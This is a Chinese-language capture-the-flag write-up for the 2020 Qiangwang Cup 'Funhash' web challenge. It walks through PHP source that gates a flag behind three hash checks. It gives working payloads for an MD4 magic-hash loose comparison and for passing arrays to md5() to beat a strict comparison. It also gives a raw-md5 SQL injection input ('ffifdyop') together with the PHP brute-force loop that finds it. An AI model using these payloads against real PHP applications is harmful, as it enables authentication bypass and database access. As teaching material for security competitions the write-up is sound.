【2020第四届“强网杯“全国网络安全挑战赛】强网先锋 Funhash

题目链接：http://39.101.177.96/

include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
     
    die('level 1 failed');
}

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
     
    die('level 2 failed');
}

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();
?>

level1：

//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
     
    die('level 1 failed');
}

判断条件: hash1的原始值要等于 hash1的md4加密值
就是加密前后相等

MD4碰撞，得
0e251288019

payload：?hash1=0e251288019

level2:

//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
     
    die('level 2 failed');
}

绕过的条件有：
变量hash2，hash3强不相等，但是两个变量的md5值要相等

这里用的 === 那么就不能 使用 上面的方法

我们使用php中md5的特性来绕过

md5([1,2]) == md5([3,4]) == NULL

当我们令MD5函数的参数为一个数组时，函数会报错并且返回NULL值。虽然参数是两个不同的数组，但返回值是相同的NULL

我们使用数组

传入 hash2[]=1&hash3=[]=2

payload:/?hash1=0e251288019&hash2[]=1&hash3[]=2

这里有相关知识点总结：

WEB漏洞汇总

level3:

//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc(); 
var_dump($row);
$result->free();
$mysqli->close();

是一个 sql注入里面的 md5

平常绕过一个password

SELECT * FROM flag WHERE password = ’ ’ or 1=1’

那么 ’ or 后面要接上一个 为 true 的表达式

SELECT * FROM flag WHERE password = ‘" . md5($_GET[“hash4”],true) . "’

那么目的就明确了 md5($_GET[“hash4”],true) 这里要为 true

参考：
https://www.pianshen.com/article/789754585/

原始md5可以包含任何字符，并且脚本将它们按原样放入查询中 - 它是一个sql注入版本。
我们要做的是强制使用原始md5包含’或’的密码，以便查询看起来像

SELECT login FROM admins WHERE  password  =  'xxx'or'xxx'

 
for ($i = 0;;) {
      
 for ($c = 0; $c < 1000000; $c++, $i++)
  if (stripos(md5($i, true), '\'or\'') !== false)
   echo "\nmd5($i) = " . md5($i, true) . "\n";
 echo ".";
}
?>

给出

content: ffifdyop 

hex: 276f722736c95d99e921722cf9ed621

craw:  'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c

string:  'or'6]!r,b

但是我们思考一下为什么6\xc9]\x99\xe9!r,\xf9\xedb\x1c的布尔值是true呢？

这里是引用
这里引用一篇文章。“a string starting with a 1 is cast as an integer when used as a boolean."
在mysql里面，在用作布尔型判断时，以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的，比如password=‘xxx’ or ‘1xxxxxxxxx’，那么就相当于password=‘xxx’ or 1 ，也就相当于password=‘xxx’ or true，所以返回值就是true。当然在我后来测试中发现，不只是1开头，只要是数字开头都是可以的。
当然如果只有数字的话，就不需要单引号，比如password=‘xxx’ or 1，那么返回值也是true。（xxx指代任意字符）

payload : /?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop

总结：

payload	作用
hash1=0e251288019	可以让md4过后的字符串和原来字符串在弱比较时表示相等
hash2[]=1&hash3[]=2	绕过两个变量的强比较
hash4=ffifdyop	使md5过后显示的值表示为'or'